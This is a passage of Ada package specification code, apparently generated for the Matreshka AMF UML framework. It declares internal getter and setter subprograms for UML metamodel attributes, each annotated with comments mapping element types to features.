Property::associationEnd -- Property => Property::associationEnd function Internal_Get_Attribute (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Classifier::attribute -- Actor => Classifier::attribute -- Artifact => Classifier::attribute -- Association => Classifier::attribute -- AssociationClass => Classifier::attribute -- Class => Classifier::attribute -- Collaboration => Classifier::attribute -- CommunicationPath => Classifier::attribute -- Component => Classifier::attribute -- DataType => Classifier::attribute -- DeploymentSpecification => Classifier::attribute -- Device => Classifier::attribute -- Enumeration => Classifier::attribute -- ExecutionEnvironment => Classifier::attribute -- Extension => Classifier::attribute -- FunctionBehavior => Classifier::attribute -- InformationItem => Classifier::attribute -- Interaction => Classifier::attribute -- Interface => Classifier::attribute -- Node => Classifier::attribute -- OpaqueBehavior => Classifier::attribute -- PrimitiveType => Classifier::attribute -- ProtocolStateMachine => Classifier::attribute -- Signal => Classifier::attribute -- StateMachine => Classifier::attribute -- Stereotype => Classifier::attribute -- UseCase => Classifier::attribute function Internal_Get_Base_Abstraction (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Base_Abstraction (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Derive => Derive::base_Abstraction -- Refine => Refine::base_Abstraction -- Trace => Trace::base_Abstraction function Internal_Get_Base_Artifact (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Base_Artifact (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Document => Document::base_Artifact -- Executable => Executable::base_Artifact -- Library => File::base_Artifact -- Script => File::base_Artifact -- Source => File::base_Artifact function Internal_Get_Base_Behavioral_Feature (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Base_Behavioral_Feature (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Create => Create::base_BehavioralFeature -- Destroy => Destroy::base_BehavioralFeature function Internal_Get_Base_Class (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Base_Class (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Auxiliary => Auxiliary::base_Class -- Focus => Focus::base_Class -- ImplementationClass => ImplementationClass::base_Class -- Metaclass => Metaclass::base_Class -- Type => Type::base_Class -- Utility => Utility::base_Class function Internal_Get_Base_Classifier (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Base_Classifier (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Realization => Realization::base_Classifier -- Specification => Specification::base_Classifier function Internal_Get_Base_Component (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Base_Component (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Entity => Entity::base_Component -- Implement => Implement::base_Component -- Process => Process::base_Component -- Service => Service::base_Component -- Subsystem => Subsystem::base_Component -- BuildComponent => BuildComponent::base_Component function Internal_Get_Base_Model (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Base_Model (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Metamodel => Metamodel::base_Model -- SystemModel => SystemModel::base_Model function Internal_Get_Base_Package (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Base_Package (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Framework => Framework::base_Package -- ModelLibrary => ModelLibrary::base_Package function Internal_Get_Base_Usage (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Base_Usage (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Call => Call::base_Usage -- Create => Create::base_Usage -- Instantiate => Instantiate::base_Usage -- Responsibility => Responsibility::base_Usage -- Send => Send::base_Usage function Internal_Get_Before (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Before (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- GeneralOrdering => GeneralOrdering::before function Internal_Get_Behavior (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Behavior (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- BehaviorExecutionSpecification => BehaviorExecutionSpecification::behavior -- CallBehaviorAction => CallBehaviorAction::behavior -- OpaqueExpression => OpaqueExpression::behavior function Internal_Get_Body (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Clause => Clause::body function Internal_Get_Body (Self : AMF.Internals.AMF_Element) return Matreshka.Internals.Strings.Shared_String_Access; procedure Internal_Set_Body (Self : AMF.Internals.AMF_Element; To : Matreshka.Internals.Strings.Shared_String_Access); -- Comment => Comment::body function Internal_Get_Body (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_String; -- FunctionBehavior => OpaqueBehavior::body -- OpaqueAction => OpaqueAction::body -- OpaqueBehavior => OpaqueBehavior::body -- OpaqueExpression => OpaqueExpression::body function Internal_Get_Body_Condition (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Body_Condition (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Operation => Operation::bodyCondition function Internal_Get_Body_Output (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Clause => Clause::bodyOutput -- LoopNode => LoopNode::bodyOutput function Internal_Get_Body_Part (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- LoopNode => LoopNode::bodyPart function Internal_Get_Bound_Element (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Bound_Element (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- TemplateBinding => TemplateBinding::boundElement function Internal_Get_Bounds (Self : AMF.Internals.AMF_Element) return AMF.DC.Optional_DC_Bounds; procedure Internal_Set_Bounds (Self : AMF.Internals.AMF_Element; To : AMF.DC.Optional_DC_Bounds); -- UMLActivityDiagram => Shape::bounds -- UMLAssociationEndLabel => Shape::bounds -- UMLAssociationOrConnectorOrLinkShape => Shape::bounds -- UMLClassDiagram => Shape::bounds -- UMLClassifierShape => Shape::bounds -- UMLCompartmentableShape => Shape::bounds -- UMLComponentDiagram => Shape::bounds -- UMLCompositeStructureDiagram => Shape::bounds -- UMLDeploymentDiagram => Shape::bounds -- UMLInteractionDiagram => Shape::bounds -- UMLInteractionTableLabel => Shape::bounds -- UMLKeywordLabel => Shape::bounds -- UMLLabel => Shape::bounds -- UMLMultiplicityLabel => Shape::bounds -- UMLNameLabel => Shape::bounds -- UMLObjectDiagram => Shape::bounds -- UMLPackageDiagram => Shape::bounds -- UMLProfileDiagram => Shape::bounds -- UMLRedefinesLabel => Shape::bounds -- UMLShape => Shape::bounds -- UMLStateMachineDiagram => Shape::bounds -- UMLStateShape => Shape::bounds -- UMLStereotypePropertyValueLabel => Shape::bounds -- UMLTypedElementLabel => Shape::bounds -- UMLUseCaseDiagram => Shape::bounds function Internal_Get_Cfragment_Gate (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- CombinedFragment => CombinedFragment::cfragmentGate -- ConsiderIgnoreFragment => CombinedFragment::cfragmentGate function Internal_Get_Change_Expression (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Change_Expression (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ChangeEvent => ChangeEvent::changeExpression function Internal_Get_Class (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Class (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ExtensionEnd => Property::class -- Operation => Operation::class -- Port => Property::class -- Property => Property::class function Internal_Get_Classifier (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Classifier (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- CreateObjectAction => CreateObjectAction::classifier -- EnumerationLiteral => EnumerationLiteral::classifier -- ReadExtentAction => ReadExtentAction::classifier -- ReadIsClassifiedObjectAction => ReadIsClassifiedObjectAction::classifier -- RedefinableTemplateSignature => RedefinableTemplateSignature::classifier function Internal_Get_Classifier (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- EnumerationLiteral => InstanceSpecification::classifier -- InstanceSpecification => InstanceSpecification::classifier function Internal_Get_Classifier_Behavior (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Classifier_Behavior (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Activity => BehavioredClassifier::classifierBehavior -- Actor => BehavioredClassifier::classifierBehavior -- AssociationClass => BehavioredClassifier::classifierBehavior -- Class => BehavioredClassifier::classifierBehavior -- Collaboration => BehavioredClassifier::classifierBehavior -- Component => BehavioredClassifier::classifierBehavior -- Device => BehavioredClassifier::classifierBehavior -- ExecutionEnvironment => BehavioredClassifier::classifierBehavior -- FunctionBehavior => BehavioredClassifier::classifierBehavior -- Interaction => BehavioredClassifier::classifierBehavior -- Node => BehavioredClassifier::classifierBehavior -- OpaqueBehavior => BehavioredClassifier::classifierBehavior -- ProtocolStateMachine => BehavioredClassifier::classifierBehavior -- StateMachine => BehavioredClassifier::classifierBehavior -- Stereotype => BehavioredClassifier::classifierBehavior -- UseCase => BehavioredClassifier::classifierBehavior function Internal_Get_Clause (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ConditionalNode => ConditionalNode::clause function Internal_Get_Client (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Abstraction => Dependency::client -- ComponentRealization => Dependency::client -- Dependency => Dependency::client -- Deployment => Dependency::client -- InterfaceRealization => Dependency::client -- Manifestation => Dependency::client -- Realization => Dependency::client -- Substitution => Dependency::client -- Usage => Dependency::client function Internal_Get_Client_Dependency (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Abstraction => NamedElement::clientDependency -- AcceptCallAction => NamedElement::clientDependency -- AcceptEventAction => NamedElement::clientDependency -- ActionExecutionSpecification => NamedElement::clientDependency -- ActionInputPin => NamedElement::clientDependency -- Activity => NamedElement::clientDependency -- ActivityFinalNode => NamedElement::clientDependency -- ActivityParameterNode => NamedElement::clientDependency -- ActivityPartition => NamedElement::clientDependency -- Actor => NamedElement::clientDependency -- AddStructuralFeatureValueAction => NamedElement::clientDependency -- AddVariableValueAction => NamedElement::clientDependency -- AnyReceiveEvent => NamedElement::clientDependency -- Artifact => NamedElement::clientDependency -- Association => NamedElement::clientDependency -- AssociationClass => NamedElement::clientDependency -- BehaviorExecutionSpecification => NamedElement::clientDependency -- BroadcastSignalAction => NamedElement::clientDependency -- CallBehaviorAction => NamedElement::clientDependency -- CallEvent => NamedElement::clientDependency -- CallOperationAction => NamedElement::clientDependency -- CentralBufferNode => NamedElement::clientDependency -- ChangeEvent => NamedElement::clientDependency -- Class => NamedElement::clientDependency -- ClearAssociationAction => NamedElement::clientDependency -- ClearStructuralFeatureAction => NamedElement::clientDependency -- ClearVariableAction => NamedElement::clientDependency -- Collaboration => NamedElement::clientDependency -- CollaborationUse => NamedElement::clientDependency -- CombinedFragment => NamedElement::clientDependency -- CommunicationPath => NamedElement::clientDependency -- Component => NamedElement::clientDependency -- ComponentRealization => NamedElement::clientDependency -- ConditionalNode => NamedElement::clientDependency -- ConnectionPointReference => NamedElement::clientDependency -- Connector => NamedElement::clientDependency -- ConsiderIgnoreFragment => NamedElement::clientDependency -- Constraint => NamedElement::clientDependency -- Continuation => NamedElement::clientDependency -- ControlFlow => NamedElement::clientDependency -- CreateLinkAction => NamedElement::clientDependency -- CreateLinkObjectAction => NamedElement::clientDependency -- CreateObjectAction => NamedElement::clientDependency -- UMLActivityDiagram => NamedElement::clientDependency -- UMLClassDiagram => NamedElement::clientDependency -- UMLComponentDiagram => NamedElement::clientDependency -- UMLCompositeStructureDiagram => NamedElement::clientDependency -- UMLDeploymentDiagram => NamedElement::clientDependency -- UMLInteractionDiagram => NamedElement::clientDependency -- UMLObjectDiagram => NamedElement::clientDependency -- UMLPackageDiagram => NamedElement::clientDependency -- UMLProfileDiagram => NamedElement::clientDependency -- UMLStateMachineDiagram => NamedElement::clientDependency -- UMLStyle => NamedElement::clientDependency -- UMLUseCaseDiagram => NamedElement::clientDependency -- DataStoreNode => NamedElement::clientDependency -- DataType => NamedElement::clientDependency -- DecisionNode => NamedElement::clientDependency -- Dependency => NamedElement::clientDependency -- Deployment => NamedElement::clientDependency -- DeploymentSpecification => NamedElement::clientDependency -- DestroyLinkAction => NamedElement::clientDependency -- DestroyObjectAction => NamedElement::clientDependency -- DestructionOccurrenceSpecification => NamedElement::clientDependency -- Device => NamedElement::clientDependency -- Duration => NamedElement::clientDependency -- DurationConstraint => NamedElement::clientDependency -- DurationInterval => NamedElement::clientDependency -- DurationObservation => NamedElement::clientDependency -- Enumeration => NamedElement::clientDependency -- EnumerationLiteral => NamedElement::clientDependency -- ExecutionEnvironment => NamedElement::clientDependency -- ExecutionOccurrenceSpecification => NamedElement::clientDependency -- ExpansionNode => NamedElement::clientDependency -- ExpansionRegion => NamedElement::clientDependency -- Expression => NamedElement::clientDependency -- Extend => NamedElement::clientDependency -- Extension => NamedElement::clientDependency -- ExtensionEnd => NamedElement::clientDependency -- ExtensionPoint => NamedElement::clientDependency -- FinalState => NamedElement::clientDependency -- FlowFinalNode => NamedElement::clientDependency -- ForkNode => NamedElement::clientDependency -- FunctionBehavior => NamedElement::clientDependency -- Gate => NamedElement::clientDependency -- GeneralOrdering => NamedElement::clientDependency -- GeneralizationSet => NamedElement::clientDependency -- Include => NamedElement::clientDependency -- InformationFlow => NamedElement::clientDependency -- InformationItem => NamedElement::clientDependency -- InitialNode => NamedElement::clientDependency -- InputPin => NamedElement::clientDependency -- InstanceSpecification => NamedElement::clientDependency -- InstanceValue => NamedElement::clientDependency -- Interaction => NamedElement::clientDependency -- InteractionConstraint => NamedElement::clientDependency -- InteractionOperand => NamedElement::clientDependency -- InteractionUse => NamedElement::clientDependency -- Interface => NamedElement::clientDependency -- InterfaceRealization => NamedElement::clientDependency -- InterruptibleActivityRegion => NamedElement::clientDependency -- Interval => NamedElement::clientDependency -- IntervalConstraint => NamedElement::clientDependency -- JoinNode => NamedElement::clientDependency -- Lifeline => NamedElement::clientDependency -- LiteralBoolean => NamedElement::clientDependency -- LiteralInteger => NamedElement::clientDependency -- LiteralNull => NamedElement::clientDependency -- LiteralReal => NamedElement::clientDependency -- LiteralString => NamedElement::clientDependency -- LiteralUnlimitedNatural => NamedElement::clientDependency -- LoopNode => NamedElement::clientDependency -- Manifestation => NamedElement::clientDependency -- MergeNode => NamedElement::clientDependency -- Message => NamedElement::clientDependency -- MessageOccurrenceSpecification => NamedElement::clientDependency -- Model => NamedElement::clientDependency -- Node => NamedElement::clientDependency -- ObjectFlow => NamedElement::clientDependency -- OccurrenceSpecification => NamedElement::clientDependency -- OpaqueAction => NamedElement::clientDependency -- OpaqueBehavior => NamedElement::clientDependency -- OpaqueExpression => NamedElement::clientDependency -- Operation => NamedElement::clientDependency -- OutputPin => NamedElement::clientDependency -- Package => NamedElement::clientDependency -- Parameter => NamedElement::clientDependency -- ParameterSet => NamedElement::clientDependency -- PartDecomposition => NamedElement::clientDependency -- Port => NamedElement::clientDependency -- PrimitiveType => NamedElement::clientDependency -- Profile => NamedElement::clientDependency -- Property => NamedElement::clientDependency -- ProtocolStateMachine => NamedElement::clientDependency -- ProtocolTransition => NamedElement::clientDependency -- Pseudostate => NamedElement::clientDependency -- RaiseExceptionAction => NamedElement::clientDependency -- ReadExtentAction => NamedElement::clientDependency -- ReadIsClassifiedObjectAction => NamedElement::clientDependency -- ReadLinkAction => NamedElement::clientDependency -- ReadLinkObjectEndAction => NamedElement::clientDependency -- ReadLinkObjectEndQualifierAction => NamedElement::clientDependency -- ReadSelfAction => NamedElement::clientDependency -- ReadStructuralFeatureAction => NamedElement::clientDependency -- ReadVariableAction => NamedElement::clientDependency -- Realization => NamedElement::clientDependency -- Reception => NamedElement::clientDependency -- ReclassifyObjectAction => NamedElement::clientDependency -- RedefinableTemplateSignature => NamedElement::clientDependency -- ReduceAction => NamedElement::clientDependency -- Region => NamedElement::clientDependency -- RemoveStructuralFeatureValueAction => NamedElement::clientDependency -- RemoveVariableValueAction => NamedElement::clientDependency -- ReplyAction => NamedElement::clientDependency -- SendObjectAction => NamedElement::clientDependency -- SendSignalAction => NamedElement::clientDependency -- SequenceNode => NamedElement::clientDependency -- Signal => NamedElement::clientDependency -- SignalEvent => NamedElement::clientDependency -- StartClassifierBehaviorAction => NamedElement::clientDependency -- StartObjectBehaviorAction => NamedElement::clientDependency -- State => NamedElement::clientDependency -- StateInvariant => NamedElement::clientDependency -- StateMachine => NamedElement::clientDependency -- Stereotype => NamedElement::clientDependency -- StringExpression => NamedElement::clientDependency -- StructuredActivityNode => NamedElement::clientDependency -- Substitution => NamedElement::clientDependency -- TestIdentityAction => NamedElement::clientDependency -- TimeConstraint => NamedElement::clientDependency -- TimeEvent => NamedElement::clientDependency -- TimeExpression => NamedElement::clientDependency -- TimeInterval => NamedElement::clientDependency -- TimeObservation => NamedElement::clientDependency -- Transition => NamedElement::clientDependency -- Trigger => NamedElement::clientDependency -- UnmarshallAction => NamedElement::clientDependency -- Usage => NamedElement::clientDependency -- UseCase => NamedElement::clientDependency -- ValuePin => NamedElement::clientDependency -- ValueSpecificationAction => NamedElement::clientDependency -- Variable => NamedElement::clientDependency function Internal_Get_Collaboration_Role (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Collaboration => Collaboration::collaborationRole function Internal_Get_Collaboration_Use (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Classifier::collaborationUse -- Actor => Classifier::collaborationUse -- Artifact => Classifier::collaborationUse -- Association => Classifier::collaborationUse -- AssociationClass => Classifier::collaborationUse -- Class => Classifier::collaborationUse -- Collaboration => Classifier::collaborationUse -- CommunicationPath => Classifier::collaborationUse -- Component => Classifier::collaborationUse -- DataType => Classifier::collaborationUse -- DeploymentSpecification => Classifier::collaborationUse -- Device => Classifier::collaborationUse -- Enumeration => Classifier::collaborationUse -- ExecutionEnvironment => Classifier::collaborationUse -- Extension => Classifier::collaborationUse -- FunctionBehavior => Classifier::collaborationUse -- InformationItem => Classifier::collaborationUse -- Interaction => Classifier::collaborationUse -- Interface => Classifier::collaborationUse -- Node => Classifier::collaborationUse -- OpaqueBehavior => Classifier::collaborationUse -- PrimitiveType => Classifier::collaborationUse -- ProtocolStateMachine => Classifier::collaborationUse -- Signal => Classifier::collaborationUse -- StateMachine => Classifier::collaborationUse -- Stereotype => Classifier::collaborationUse -- UseCase => Classifier::collaborationUse function Internal_Get_Collection (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Collection (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ReduceAction => ReduceAction::collection function Internal_Get_Compartment (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- UMLClassifierShape => UMLCompartmentableShape::compartment -- UMLCompartmentableShape => UMLCompartmentableShape::compartment -- UMLStateShape => UMLCompartmentableShape::compartment function Internal_Get_Computation (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Computation (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Derive => Derive::computation function Internal_Get_Concurrency (Self : AMF.Internals.AMF_Element) return AMF.UML.UML_Call_Concurrency_Kind; procedure Internal_Set_Concurrency (Self : AMF.Internals.AMF_Element; To : AMF.UML.UML_Call_Concurrency_Kind); -- Operation => BehavioralFeature::concurrency -- Reception => BehavioralFeature::concurrency function Internal_Get_Condition (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Condition (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Extend => Extend::condition function Internal_Get_Condition (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ParameterSet => ParameterSet::condition function Internal_Get_Configuration (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Deployment => Deployment::configuration function Internal_Get_Conformance (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ProtocolStateMachine => ProtocolStateMachine::conformance function Internal_Get_Connection (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- FinalState => State::connection -- State => State::connection function Internal_Get_Connection_Point (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- FinalState => State::connectionPoint -- ProtocolStateMachine => StateMachine::connectionPoint -- State => State::connectionPoint -- StateMachine => StateMachine::connectionPoint function Internal_Get_Connector (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Connector (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Message => Message::connector function Internal_Get_Constrained_Element (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Constraint => Constraint::constrainedElement -- DurationConstraint => Constraint::constrainedElement -- InteractionConstraint => Constraint::constrainedElement -- IntervalConstraint => Constraint::constrainedElement -- TimeConstraint => Constraint::constrainedElement function Internal_Get_Constraining_Classifier (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ClassifierTemplateParameter => ClassifierTemplateParameter::constrainingClassifier function Internal_Get_Contained_Edge (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ActivityPartition => ActivityGroup::containedEdge -- ConditionalNode => ActivityGroup::containedEdge -- ExpansionRegion => ActivityGroup::containedEdge -- InterruptibleActivityRegion => ActivityGroup::containedEdge -- LoopNode => ActivityGroup::containedEdge -- SequenceNode => ActivityGroup::containedEdge -- StructuredActivityNode => ActivityGroup::containedEdge function Internal_Get_Contained_Node (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ActivityPartition => ActivityGroup::containedNode -- ConditionalNode => ActivityGroup::containedNode -- ExpansionRegion => ActivityGroup::containedNode -- InterruptibleActivityRegion => ActivityGroup::containedNode -- LoopNode => ActivityGroup::containedNode -- SequenceNode => ActivityGroup::containedNode -- StructuredActivityNode => ActivityGroup::containedNode function Internal_Get_Container (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Container (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ConnectionPointReference => Vertex::container -- FinalState => Vertex::container -- ProtocolTransition => Transition::container -- Pseudostate => Vertex::container -- State => Vertex::container -- Transition => Transition::container function Internal_Get_Content (Self : AMF.Internals.AMF_Element) return Matreshka.Internals.Strings.Shared_String_Access; procedure Internal_Set_Content (Self : AMF.Internals.AMF_Element; To : Matreshka.Internals.Strings.Shared_String_Access); -- Image => Image::content function Internal_Get_Context (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; -- AcceptCallAction => Action::context -- AcceptEventAction => Action::context -- Activity => Behavior::context -- AddStructuralFeatureValueAction => Action::context -- AddVariableValueAction => Action::context -- BroadcastSignalAction => Action::context -- CallBehaviorAction => Action::context -- CallOperationAction => Action::context -- ClearAssociationAction => Action::context -- ClearStructuralFeatureAction => Action::context -- ClearVariableAction => Action::context -- ConditionalNode => Action::context -- Constraint => Constraint::context -- CreateLinkAction => Action::context -- CreateLinkObjectAction => Action::context -- CreateObjectAction => Action::context -- DestroyLinkAction => Action::context -- DestroyObjectAction => Action::context -- DurationConstraint => Constraint::context -- ExpansionRegion => Action::context -- FunctionBehavior => Behavior::context -- Interaction => Behavior::context -- InteractionConstraint => Constraint::context -- IntervalConstraint => Constraint::context -- LoopNode => Action::context -- OpaqueAction => Action::context -- OpaqueBehavior => Behavior::context -- ProtocolStateMachine => Behavior::context -- RaiseExceptionAction => Action::context -- ReadExtentAction => Action::context -- ReadIsClassifiedObjectAction => Action::context -- ReadLinkAction => Action::context -- ReadLinkObjectEndAction => Action::context -- ReadLinkObjectEndQualifierAction => Action::context -- ReadSelfAction => Action::context -- ReadStructuralFeatureAction => Action::context -- ReadVariableAction => Action::context -- ReclassifyObjectAction => Action::context -- ReduceAction => Action::context -- RemoveStructuralFeatureValueAction => Action::context -- RemoveVariableValueAction => Action::context -- ReplyAction => Action::context -- SendObjectAction => Action::context -- SendSignalAction => Action::context -- SequenceNode => Action::context -- StartClassifierBehaviorAction => Action::context -- StartObjectBehaviorAction => Action::context -- StateMachine => Behavior::context -- StructuredActivityNode => Action::context -- TestIdentityAction => Action::context -- TimeConstraint => Constraint::context -- UnmarshallAction => Action::context -- ValueSpecificationAction => Action::context function Internal_Get_Contract (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Connector => Connector::contract function Internal_Get_Contract (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Contract (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- InterfaceRealization => InterfaceRealization::contract -- Substitution => Substitution::contract function Internal_Get_Conveyed (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- InformationFlow => InformationFlow::conveyed function Internal_Get_Covered (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ActionExecutionSpecification => InteractionFragment::covered -- BehaviorExecutionSpecification => InteractionFragment::covered -- CombinedFragment => InteractionFragment::covered -- ConsiderIgnoreFragment => InteractionFragment::covered -- Continuation => InteractionFragment::covered -- DestructionOccurrenceSpecification => InteractionFragment::covered -- ExecutionOccurrenceSpecification => InteractionFragment::covered -- Interaction => InteractionFragment::covered -- InteractionOperand => InteractionFragment::covered -- InteractionUse => InteractionFragment::covered -- MessageOccurrenceSpecification => InteractionFragment::covered -- OccurrenceSpecification => InteractionFragment::covered -- PartDecomposition => InteractionFragment::covered -- StateInvariant => InteractionFragment::covered function Internal_Get_Covered (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Covered (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- DestructionOccurrenceSpecification => OccurrenceSpecification::covered -- ExecutionOccurrenceSpecification => OccurrenceSpecification::covered -- MessageOccurrenceSpecification => OccurrenceSpecification::covered -- OccurrenceSpecification => OccurrenceSpecification::covered -- StateInvariant => StateInvariant::covered function Internal_Get_Covered_By (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Lifeline => Lifeline::coveredBy function Internal_Get_Datatype (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Datatype (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ExtensionEnd => Property::datatype -- Operation => Operation::datatype -- Port => Property::datatype -- Property => Property::datatype function Internal_Get_Decider (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Decider (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Clause => Clause::decider -- LoopNode => LoopNode::decider function Internal_Get_Decision_Input (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Decision_Input (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- DecisionNode => DecisionNode::decisionInput function Internal_Get_Decision_Input_Flow (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Decision_Input_Flow (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- DecisionNode => DecisionNode::decisionInputFlow function Internal_Get_Decomposed_As (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Decomposed_As (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Lifeline => Lifeline::decomposedAs function Internal_Get_Default (Self : AMF.Internals.AMF_Element) return Matreshka.Internals.Strings.Shared_String_Access; procedure Internal_Set_Default (Self : AMF.Internals.AMF_Element; To : Matreshka.Internals.Strings.Shared_String_Access); -- ExtensionEnd => Property::default -- Parameter => Parameter::default -- Port => Property::default -- Property => Property::default function Internal_Get_Default (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Default (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ClassifierTemplateParameter => TemplateParameter::default -- ConnectableElementTemplateParameter => TemplateParameter::default -- OperationTemplateParameter => TemplateParameter::default -- TemplateParameter => TemplateParameter::default function Internal_Get_Default_Value (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Default_Value (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ExtensionEnd => Property::defaultValue -- Parameter => Parameter::defaultValue -- Port => Property::defaultValue -- Property => Property::defaultValue function Internal_Get_Deferrable_Trigger (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- FinalState => State::deferrableTrigger -- State => State::deferrableTrigger function Internal_Get_Defining_End (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; -- ConnectorEnd => ConnectorEnd::definingEnd function Internal_Get_Defining_Feature (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Defining_Feature (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Slot => 